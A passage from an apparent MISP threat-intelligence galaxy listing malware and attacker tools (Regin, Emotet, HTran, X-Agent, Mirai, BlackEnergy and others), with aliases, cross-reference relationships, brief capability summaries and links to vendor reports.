TinyZBot has relationships with:

  • similar: misp-galaxy:mitre-malware="TinyZBot - S0004" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TinyZbot" with estimative-language:likelihood-probability="almost-certain"

GHOLE

The tag is: misp-galaxy:tool="GHOLE"

GHOLE has relationships with:

  • similar: misp-galaxy:malpedia="Ghole" with estimative-language:likelihood-probability="almost-certain"

CWoolger

The tag is: misp-galaxy:tool="CWoolger"

FireMalv

The tag is: misp-galaxy:tool="FireMalv"

FireMalv has relationships with:

  • similar: misp-galaxy:malpedia="FireMalv" with estimative-language:likelihood-probability="likely"

Regin

Regin (also known as Prax or WarriorPride) is a sophisticated malware toolkit revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. The malware targets specific users of Microsoft Windows-based computers and has been linked to the US intelligence gathering agency NSA and its British counterpart, the GCHQ. The Intercept provided samples of Regin for download including malware discovered at Belgian telecommunications provider, Belgacom. Kaspersky Lab says it first became aware of Regin in spring 2012, but that some of the earliest samples date from 2003. The name Regin is first found on the VirusTotal website on 9 March 2011.

The tag is: misp-galaxy:tool="Regin"

Regin is also known as:

  • Prax

  • WarriorPride

Regin has relationships with:

  • similar: misp-galaxy:mitre-malware="Regin - S0019" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Regin" with estimative-language:likelihood-probability="likely"

Table 16328. Table References

Links

https://en.wikipedia.org/wiki/Regin_(malware)

Duqu

The tag is: misp-galaxy:tool="Duqu"

Duqu has relationships with:

  • similar: misp-galaxy:mitre-malware="Duqu - S0038" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="DuQu" with estimative-language:likelihood-probability="almost-certain"

Flame

The tag is: misp-galaxy:tool="Flame"

Flame has relationships with:

  • similar: misp-galaxy:mitre-malware="Flame - S0143" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Flame" with estimative-language:likelihood-probability="almost-certain"

Stuxnet

The tag is: misp-galaxy:tool="Stuxnet"

Stuxnet has relationships with:

  • similar: misp-galaxy:malpedia="Stuxnet" with estimative-language:likelihood-probability="likely"

EquationLaser

The tag is: misp-galaxy:tool="EquationLaser"

EquationDrug

The tag is: misp-galaxy:tool="EquationDrug"

EquationDrug has relationships with:

  • similar: misp-galaxy:malpedia="EquationDrug" with estimative-language:likelihood-probability="likely"

DoubleFantasy

The tag is: misp-galaxy:tool="DoubleFantasy"

TripleFantasy

The tag is: misp-galaxy:tool="TripleFantasy"

Fanny

The tag is: misp-galaxy:tool="Fanny"

Fanny has relationships with:

  • similar: misp-galaxy:malpedia="Fanny" with estimative-language:likelihood-probability="likely"

GrayFish

The tag is: misp-galaxy:tool="GrayFish"

Babar

The tag is: misp-galaxy:tool="Babar"

Babar has relationships with:

  • similar: misp-galaxy:malpedia="Babar" with estimative-language:likelihood-probability="likely"

Bunny

The tag is: misp-galaxy:tool="Bunny"

Casper

The tag is: misp-galaxy:tool="Casper"

Casper has relationships with:

  • similar: misp-galaxy:malpedia="Casper" with estimative-language:likelihood-probability="likely"

NBot

The tag is: misp-galaxy:tool="NBot"

Tafacalou

The tag is: misp-galaxy:tool="Tafacalou"

Tdrop

The tag is: misp-galaxy:tool="Tdrop"

Troy

The tag is: misp-galaxy:tool="Troy"

Tdrop2

The tag is: misp-galaxy:tool="Tdrop2"

ZXShell

ZxShell is a remote access trojan (RAT). It was developed in 2006 by the persona "LZX", who then publicly released the source code in 2007

The tag is: misp-galaxy:tool="ZXShell"

ZXShell is also known as:

  • Sensode

ZXShell has relationships with:

  • similar: misp-galaxy:malpedia="ZXShell" with estimative-language:likelihood-probability="likely"

Table 16329. Table References

Links

http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html

https://blogs.cisco.com/security/talos/opening-zxshell

https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

T9000

The tag is: misp-galaxy:tool="T9000"

T9000 has relationships with:

  • similar: misp-galaxy:mitre-malware="T9000 - S0098" with estimative-language:likelihood-probability="likely"

Table 16330. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/

T5000

The tag is: misp-galaxy:tool="T5000"

T5000 is also known as:

  • Plat1

Table 16331. Table References

Links

http://www.cylance.com/techblog/Grand-Theft-Auto-Panda.shtml

Taidoor

The tag is: misp-galaxy:tool="Taidoor"

Taidoor has relationships with:

  • similar: misp-galaxy:mitre-malware="Taidoor - S0011" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="taidoor" with estimative-language:likelihood-probability="almost-certain"

Table 16332. Table References

Links

http://www.symantec.com/connect/blogs/trojantaidoor-takes-aim-policy-think-tanks

Rekaf

The tag is: misp-galaxy:tool="Rekaf"

Table 16334. Table References

Links

https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks

Scieron

The tag is: misp-galaxy:tool="Scieron"

Scieron has relationships with:

  • similar: misp-galaxy:malpedia="Scieron" with estimative-language:likelihood-probability="almost-certain"

SkeletonKey

The tag is: misp-galaxy:tool="SkeletonKey"

Table 16335. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/

Skyipot

The tag is: misp-galaxy:tool="Skyipot"

Table 16336. Table References

Links

http://labs.alienvault.com/labs/index.php/2011/another-sykipot-sample-likely-targeting-us-federal-agencies/

Spindest

The tag is: misp-galaxy:tool="Spindest"

Table 16337. Table References

Links

http://www.threatconnect.com/news/threatconnect-enables-healthy-networking-biomed-life-sciences-industry/

Preshin

The tag is: misp-galaxy:tool="Preshin"

Oficla

The tag is: misp-galaxy:tool="Oficla"

Oficla has relationships with:

  • similar: misp-galaxy:botnet="BredoLab" with estimative-language:likelihood-probability="likely"

PCClient RAT

The tag is: misp-galaxy:tool="PCClient RAT"

Table 16338. Table References

Links

http://researchcenter.paloaltonetworks.com/2014/10/new-indicators-compromise-apt-group-nitro-uncovered/

Plexor

The tag is: misp-galaxy:tool="Plexor"

Mongall

The tag is: misp-galaxy:tool="Mongall"

Mongall has relationships with:

  • similar: misp-galaxy:malpedia="mongall" with estimative-language:likelihood-probability="almost-certain"

Table 16339. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

NeD Worm

The tag is: misp-galaxy:tool="NeD Worm"

NeD Worm has relationships with:

  • similar: misp-galaxy:mitre-malware="DustySky - S0062" with estimative-language:likelihood-probability="likely"

Table 16340. Table References

Links

http://www.clearskysec.com/dustysky/

NewCT

The tag is: misp-galaxy:tool="NewCT"

NewCT has relationships with:

  • similar: misp-galaxy:malpedia="NewCT" with estimative-language:likelihood-probability="likely"

Table 16341. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

Nflog

The tag is: misp-galaxy:tool="Nflog"

Table 16342. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

Janicab

The tag is: misp-galaxy:tool="Janicab"

Janicab has relationships with:

  • similar: misp-galaxy:mitre-malware="Janicab - S0163" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Janicab (OS X)" with estimative-language:likelihood-probability="almost-certain"

Table 16343. Table References

Links

http://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/

Jripbot

The tag is: misp-galaxy:tool="Jripbot"

Jripbot is also known as:

  • Jiripbot

Jripbot has relationships with:

  • similar: misp-galaxy:malpedia="JripBot" with estimative-language:likelihood-probability="almost-certain"

Table 16344. Table References

Links

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/butterfly-corporate-spies-out-for-financial-gain.pdf

Jolob

The tag is: misp-galaxy:tool="Jolob"

Jolob has relationships with:

  • similar: misp-galaxy:malpedia="Jolob" with estimative-language:likelihood-probability="likely"

Table 16345. Table References

Links

http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html

IsSpace

The tag is: misp-galaxy:tool="IsSpace"

IsSpace has relationships with:

  • similar: misp-galaxy:malpedia="IsSpace" with estimative-language:likelihood-probability="likely"

Table 16346. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

Emotet

The tag is: misp-galaxy:tool="Emotet"

Emotet is also known as:

  • Geodo

Emotet has relationships with:

  • similar: misp-galaxy:banker="Geodo" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Emotet" with estimative-language:likelihood-probability="likely"

Table 16347. Table References

Links

https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/

https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet

https://www.bleepingcomputer.com/news/security/emotet-returns-with-thanksgiving-theme-and-better-phishing-tricks/

https://cofense.com/major-us-financial-institutions-imitated-advanced-geodo-emotet-phishing-lures-appear-authentic-containing-proofpoint-url-wrapped-links/

Hoardy

The tag is: misp-galaxy:tool="Hoardy"

Hoardy is also known as:

  • Hoarde

  • Phindolp

  • BS2005

Hoardy has relationships with:

  • similar: misp-galaxy:mitre-malware="BS2005 - S0014" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="BS2005" with estimative-language:likelihood-probability="likely"

Table 16348. Table References

Links

https://github.com/nccgroup/Royal_APT

Htran

HUC Packet Transmitter (HTran) is a proxy tool, used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker’s communications with victim networks. The tool has been freely available on the internet since at least 2009. HTran facilitates TCP connections between the victim and a hop point controlled by an attacker. Malicious cyber actors can use this technique to redirect their packets through multiple compromised hosts running HTran, to gain greater access to hosts in a network

The tag is: misp-galaxy:tool="Htran"

Htran is also known as:

  • HUC Packet Transmitter

  • HTran

Htran has relationships with:

  • similar: misp-galaxy:malpedia="HTran" with estimative-language:likelihood-probability="almost-certain"

Table 16349. Table References

Links

http://www.secureworks.com/research/threats/htran/

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

HTTPBrowser

The tag is: misp-galaxy:tool="HTTPBrowser"

HTTPBrowser is also known as:

  • TokenControl

HTTPBrowser has relationships with:

  • similar: misp-galaxy:mitre-malware="HTTPBrowser - S0070" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="HttpBrowser" with estimative-language:likelihood-probability="almost-certain"

Table 16350. Table References

Links

https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

Disgufa

The tag is: misp-galaxy:tool="Disgufa"

Elirks

The tag is: misp-galaxy:tool="Elirks"

Elirks has relationships with:

  • similar: misp-galaxy:malpedia="Elirks" with estimative-language:likelihood-probability="likely"

Snifula

The tag is: misp-galaxy:tool="Snifula"

Snifula is also known as:

  • Ursnif

Snifula has relationships with:

  • similar: misp-galaxy:banker="Gozi" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Gozi" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Snifula" with estimative-language:likelihood-probability="likely"

Table 16351. Table References

Links

https://www.circl.lu/pub/tr-13/

Aumlib

The tag is: misp-galaxy:tool="Aumlib"

Aumlib is also known as:

  • Yayih

  • mswab

  • Graftor

Aumlib has relationships with:

  • similar: misp-galaxy:malpedia="Graftor" with estimative-language:likelihood-probability="likely"

Table 16352. Table References

Links

http://www.cybersquared.com/killing-with-a-borrowed-knife-chaining-core-cloud-service-profile-infrastructure-for-cyber-attacks

CTRat

The tag is: misp-galaxy:tool="CTRat"

Table 16353. Table References

Links

http://www.fireeye.com/blog/technical/threat-intelligence/2014/07/spy-of-the-tiger.html

Emdivi

The tag is: misp-galaxy:tool="Emdivi"

Emdivi is also known as:

  • Newsripper

Emdivi has relationships with:

  • similar: misp-galaxy:malpedia="Emdivi" with estimative-language:likelihood-probability="likely"

Table 16354. Table References

Links

http://www.symantec.com/connect/blogs/operation-cloudyomega-ichitaro-zero-day-and-ongoing-cyberespionage-campaign-targeting-japan

Etumbot

The tag is: misp-galaxy:tool="Etumbot"

Etumbot is also known as:

  • Exploz

  • Specfix

  • RIPTIDE

Etumbot has relationships with:

  • similar: misp-galaxy:mitre-malware="RIPTIDE - S0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="EtumBot" with estimative-language:likelihood-probability="almost-certain"

Table 16355. Table References

Links

www.arbornetworks.com/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf[www.arbornetworks.com/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf]

Fexel

The tag is: misp-galaxy:tool="Fexel"

Fexel is also known as:

  • Loneagent

Fysbis

The tag is: misp-galaxy:tool="Fysbis"

Table 16356. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/

Hikit

The tag is: misp-galaxy:tool="Hikit"

Hikit has relationships with:

  • similar: misp-galaxy:mitre-malware="Hikit - S0009" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="HiKit" with estimative-language:likelihood-probability="almost-certain"

Table 16357. Table References

Links

https://blog.bit9.com/2013/02/25/bit9-security-incident-update/

Hancitor

The tag is: misp-galaxy:tool="Hancitor"

Hancitor is also known as:

  • Tordal

  • Chanitor

  • Pony

Hancitor has relationships with:

  • similar: misp-galaxy:malpedia="Hancitor" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Pony" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Fareit" with estimative-language:likelihood-probability="likely"

Table 16358. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear

Ruckguv

The tag is: misp-galaxy:tool="Ruckguv"

Ruckguv has relationships with:

  • similar: misp-galaxy:malpedia="Ruckguv" with estimative-language:likelihood-probability="likely"

Table 16359. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear

HDRoot

The tag is: misp-galaxy:tool="HDRoot"

HDRoot has relationships with:

  • similar: misp-galaxy:malpedia="HDRoot" with estimative-language:likelihood-probability="almost-certain"

Table 16362. Table References

Links

http://williamshowalter.com/a-universal-windows-bootkit/

IRONGATE

The tag is: misp-galaxy:tool="IRONGATE"

Table 16363. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/06/irongate_ics_malware.html

ShimRAT

The tag is: misp-galaxy:tool="ShimRAT"

Table 16364. Table References

Links

https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

X-Agent

APT28’s second-stage persistent macOS backdoor. This backdoor component is known to have a modular structure featuring various espionage functionalities, such as key-logging, screen grabbing and file exfiltration. This component is available for Osx, Windows, Linux and iOS operating systems.

Xagent is a modular backdoor with spying functionalities such as keystroke logging and file exfiltration. Xagent is the group’s flagship backdoor and heavily used in their operations. Early versions for Linux and Windows were seen years ago, then in 2015 an iOS version came out. One year later, an Android version was discovered and finally, in the beginning of 2017, an Xagent sample for OS X was described.

The tag is: misp-galaxy:tool="X-Agent"

X-Agent is also known as:

  • XAgent

X-Agent has relationships with:

  • similar: misp-galaxy:mitre-malware="CHOPSTICK - S0023" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="X-Agent for Android - S0314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CHOPSTICK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="X-Agent (Android)" with estimative-language:likelihood-probability="likely"

Table 16365. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/

https://app.box.com/s/l7n781ig6n8wlf1aff5hgwbh4qoi5jqq

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

https://objective-see.com/blog/blog_0x25.html#XAgent

X-Tunnel

The tag is: misp-galaxy:tool="X-Tunnel"

X-Tunnel is also known as:

  • XTunnel

X-Tunnel has relationships with:

  • similar: misp-galaxy:mitre-malware="XTunnel - S0117" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="XTunnel" with estimative-language:likelihood-probability="likely"

Foozer

The tag is: misp-galaxy:tool="Foozer"

Table 16366. Table References

Links

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

WinIDS

The tag is: misp-galaxy:tool="WinIDS"

Table 16367. Table References

Links

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

DownRange

The tag is: misp-galaxy:tool="DownRange"

Table 16368. Table References

Links

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

Mad Max

The tag is: misp-galaxy:tool="Mad Max"

Mad Max has relationships with:

  • similar: misp-galaxy:botnet="Madmax" with estimative-language:likelihood-probability="likely"

Table 16369. Table References

Links

https://www.arbornetworks.com/blog/asert/mad-max-dga/

Crimson

Crimson is malware used as part of a campaign known as Operation Transparent Tribe that targeted Indian diplomatic and military victims

The tag is: misp-galaxy:tool="Crimson"

Crimson has relationships with:

  • similar: misp-galaxy:rat="Crimson" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Crimson - S0115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Crimson RAT" with estimative-language:likelihood-probability="likely"

Table 16370. Table References

Links

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF

Prikormka

Operation Groundbait based on our research into the Prikormka malware family. This includes detailed technical analysis of the Prikormka malware family and its spreading mechanisms, and a description of the most noteworthy attack campaigns.

The tag is: misp-galaxy:tool="Prikormka"

Prikormka has relationships with:

  • similar: misp-galaxy:mitre-malware="Prikormka - S0113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Prikormka" with estimative-language:likelihood-probability="almost-certain"

Table 16371. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf

NanHaiShu

This whitepaper details a malicious program we identify as NanHaiShu. Based on our analysis, the threat actor behind this malware targets government and private-sector organizations.

The tag is: misp-galaxy:tool="NanHaiShu"

NanHaiShu has relationships with:

  • similar: misp-galaxy:mitre-malware="NanHaiShu - S0228" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="NanHaiShu" with estimative-language:likelihood-probability="almost-certain"

Table 16372. Table References

Links

https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf

Umbreon

Umbreon (sharing the same name as the Pokémon) targets Linux systems, including systems running both Intel and ARM processors, expanding the scope of this threat to include embedded devices as well.

The tag is: misp-galaxy:tool="Umbreon"

Umbreon has relationships with:

  • similar: misp-galaxy:mitre-malware="Umbreon - S0221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Umbreon" with estimative-language:likelihood-probability="likely"

Table 16373. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/

Odinaff

Odinaff is typically deployed in the first stage of an attack, to gain a foothold onto the network, providing a persistent presence and the ability to install additional tools onto the target network. These additional tools bear the hallmarks of a sophisticated attacker which has plagued the financial industry since at least 2013–Carbanak. This new wave of attacks has also used some infrastructure that has previously been used in Carbanak campaigns.

The tag is: misp-galaxy:tool="Odinaff"

Odinaff has relationships with:

  • similar: misp-galaxy:malpedia="Odinaff" with estimative-language:likelihood-probability="likely"

Table 16374. Table References

Links

https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

Hworm

Unit 42 has observed a new version of Hworm (or Houdini) being used within multiple attacks. This blog outlines technical details of this new Hworm version and documents an attack campaign making use of the backdoor. Of the samples used in this attack, the first we observed were June 2016, while as-of publication we were still seeing attacks as recently as mid-October, suggesting that this is likely an active, ongoing campaign.

The tag is: misp-galaxy:tool="Hworm"

Hworm is also known as:

  • Houdini

Hworm has relationships with:

  • similar: misp-galaxy:malpedia="Houdini" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="H-worm" with estimative-language:likelihood-probability="likely"

Table 16375. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/

Backdoor.Dripion

Backdoor.Dripion was custom developed, deployed in a highly targeted fashion, and used command and control servers disguised as antivirus company websites.

The tag is: misp-galaxy:tool="Backdoor.Dripion"

Backdoor.Dripion is also known as:

  • Dripion

Table 16376. Table References

Links

http://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan

Adwind

Adwind is a backdoor written purely in Java that targets system supporting the Java runtime environment. Commands that can be used, among other things, to display messages on the system, open URLs, update the malware, download/execute files, and download/load plugins. A significant amount of additional functionality can be provided through downloadable plugins, including such things as remote control options and shell command execution.

The tag is: misp-galaxy:tool="Adwind"

Adwind is also known as:

  • AlienSpy

  • Frutas

  • Unrecom

  • Sockrat

  • JSocket

  • jRat

  • Backdoor:Java/Adwind

Adwind has relationships with:

  • similar: misp-galaxy:rat="Adwind RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sockrat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 16377. Table References

Links

https://securelist.com/blog/research/73660/adwind-faq/

Bedep

The tag is: misp-galaxy:tool="Bedep"

Bedep has relationships with:

  • similar: misp-galaxy:malpedia="Bedep" with estimative-language:likelihood-probability="likely"

Cromptui

The tag is: misp-galaxy:tool="Cromptui"

Dridex

Dridex is a strain of banking malware that leverages macros in Microsoft Office to infect systems. Once a computer has been infected, Dridex attackers can steal banking credentials and other personal information on the system to gain access to the financial records of a user.

The tag is: misp-galaxy:tool="Dridex"

Dridex is also known as:

  • Cridex

Dridex has relationships with:

  • similar: misp-galaxy:banker="Dridex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dridex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:banker="Feodo" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Feodo" with estimative-language:likelihood-probability="likely"

Table 16378. Table References

Links

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf

Fareit

The tag is: misp-galaxy:tool="Fareit"

Fareit has relationships with:

  • similar: misp-galaxy:malpedia="Pony" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Hancitor" with estimative-language:likelihood-probability="likely"

Gafgyt

The tag is: misp-galaxy:tool="Gafgyt"

Gafgyt has relationships with:

  • similar: misp-galaxy:malpedia="Bashlite" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:botnet="Gafgyt" with estimative-language:likelihood-probability="likely"

Gamarue

The tag is: misp-galaxy:tool="Gamarue"

Gamarue is also known as:

  • Andromeda

Gamarue has relationships with:

  • similar: misp-galaxy:malpedia="Andromeda" with estimative-language:likelihood-probability="likely"

Table 16379. Table References

Links

https://blog.gdatasoftware.com/2015/03/24274-the-andromeda-gamarue-botnet-is-on-the-rise-again

Necurs

The Necurs botnet is a distributor of many pieces of malware, most notably Locky.

The tag is: misp-galaxy:tool="Necurs"

Necurs has relationships with:

  • similar: misp-galaxy:malpedia="Necurs" with estimative-language:likelihood-probability="likely"

Table 16380. Table References

Links

https://en.wikipedia.org/wiki/Necurs_botnet

https://www.bleepingcomputer.com/news/security/worlds-largest-spam-botnet-finds-a-new-way-to-avoid-detection-for-now/

Palevo

The tag is: misp-galaxy:tool="Palevo"

Akbot

The tag is: misp-galaxy:tool="Akbot"

Akbot is also known as:

  • Qbot

  • Qakbot

  • PinkSlipBot

Akbot has relationships with:

  • similar: misp-galaxy:banker="Qakbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:botnet="Akbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="likely"

Table 16381. Table References

Links

https://en.wikipedia.org/wiki/Akbot

Upatre

Upatre is a Trojan downloader that is used to set up other threats on the victim’s PC. Upatre has been used recently in several high profile Trojan attacks involving the Gameover Trojan.

The tag is: misp-galaxy:tool="Upatre"

Upatre has relationships with:

  • similar: misp-galaxy:malpedia="Upatre" with estimative-language:likelihood-probability="likely"

Vawtrak

Vawtrak is an information stealing malware family that is primarily used to gain unauthorised access to bank accounts through online banking websites.

The tag is: misp-galaxy:tool="Vawtrak"

Vawtrak has relationships with:

  • similar: misp-galaxy:banker="Vawtrak" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Vawtrak" with estimative-language:likelihood-probability="likely"

Table 16382. Table References

Links

https://www.sophos.com/medialibrary/PDFs/technical%20papers/sophos-vawtrak-international-crimeware-as-a-service-tpna.pdf

Empire

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework

The tag is: misp-galaxy:tool="Empire"

Empire has relationships with:

  • similar: misp-galaxy:exploit-kit="Empire" with estimative-language:likelihood-probability="likely"

Table 16383. Table References

Links

https://github.com/adaptivethreat/Empire

Explosive

Beginning in late 2012, a carefully orchestrated attack campaign we call Volatile Cedar has been targeting individuals, companies and institutions worldwide. This campaign, led by a persistent attacker group, has successfully penetrated a large number of targets using various attack techniques, and specifically, a custom-made malware implant codenamed Explosive.

The tag is: misp-galaxy:tool="Explosive"

Table 16384. Table References

Links

https://www.checkpoint.com/downloads/volatile-cedar-technical-report.pdf

KeyBoy

The actors used a new version of “KeyBoy,” a custom backdoor first disclosed by researchers at Rapid7 in June 2013. Their work outlined the capabilities of the backdoor, and exposed the protocols and algorithms used to hide the network communication and configuration data

The tag is: misp-galaxy:tool="KeyBoy"

KeyBoy has relationships with:

  • similar: misp-galaxy:malpedia="KeyBoy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Yahoyah" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Yahoyah" with estimative-language:likelihood-probability="likely"

Table 16385. Table References

Links

https://citizenlab.org/2016/11/parliament-keyboy/

https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india

Yahoyah

The attacks in this case are associated with a campaign called Tropic Trooper, which has been active since at least 2011 and is known for heavily targeting Taiwan. One of the attacks used their known Yahoyah malware…​

The tag is: misp-galaxy:tool="Yahoyah"

Yahoyah is also known as:

  • W32/Seeav

Yahoyah has relationships with:

  • similar: misp-galaxy:malpedia="KeyBoy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Yahoyah" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="KeyBoy" with estimative-language:likelihood-probability="likely"

Table 16386. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

Tartine

Delphi RAT used by Sofacy.

The tag is: misp-galaxy:tool="Tartine"

Mirai

Mirai (Japanese for "the future") is malware that turns computer systems running Linux into remotely controlled "bots", that can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as remote cameras and home routers. The Mirai botnet has been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks, including an attack on 20 September 2016 on computer security journalist Brian Krebs’s web site, an attack on French web host OVH and the October 2016 Dyn cyberattack.

The tag is: misp-galaxy:tool="Mirai"

Mirai is also known as:

  • Linux/Mirai

Mirai has relationships with:

  • similar: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Mirai (ELF)" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Owari" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Sora" with estimative-language:likelihood-probability="likely"

Table 16387. Table References

Links

https://en.wikipedia.org/wiki/Mirai_(malware)

Masuta

IoT malware based on Mirai but slightly improved.

The tag is: misp-galaxy:tool="Masuta"

Masuta is also known as:

  • PureMasuta

Masuta has relationships with:

  • similar: misp-galaxy:malpedia="Masuta" with estimative-language:likelihood-probability="almost-certain"

Table 16388. Table References

Links

https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7

BASHLITE

The tag is: misp-galaxy:tool="BASHLITE"

BASHLITE has relationships with:

  • similar: misp-galaxy:malpedia="Bashlite" with estimative-language:likelihood-probability="almost-certain"

BlackEnergy

BlackEnergy is a trojan which has undergone significant functional changes since it was first publicly analysed by Arbor Networks in 2007. It has evolved from a relatively simple DDoS trojan into a relatively sophisticated piece of modern malware with a modular architecture, making it a suitable tool for sending spam and for online bank fraud, as well as for targeted attacks. BlackEnergy version 2, which featured rootkit techniques, was documented by SecureWorks in 2010. The targeted attacks recently discovered are proof that the trojan is still alive and kicking in 2014. We provide a technical analysis of the BlackEnergy family, focusing on novel functionality and the differences introduced by new lite variants. We describe the most notable aspects of the malware, including its techniques for bypassing UAC, defeating the signed driver requirement in Windows and a selection of BlackEnergy2 plug-ins used for parasitic file infections, network discovery and remote code execution and data collection.

The tag is: misp-galaxy:tool="BlackEnergy"

BlackEnergy has relationships with:

  • similar: misp-galaxy:mitre-malware="BlackEnergy - S0089" with estimative-language:likelihood-probability="likely"

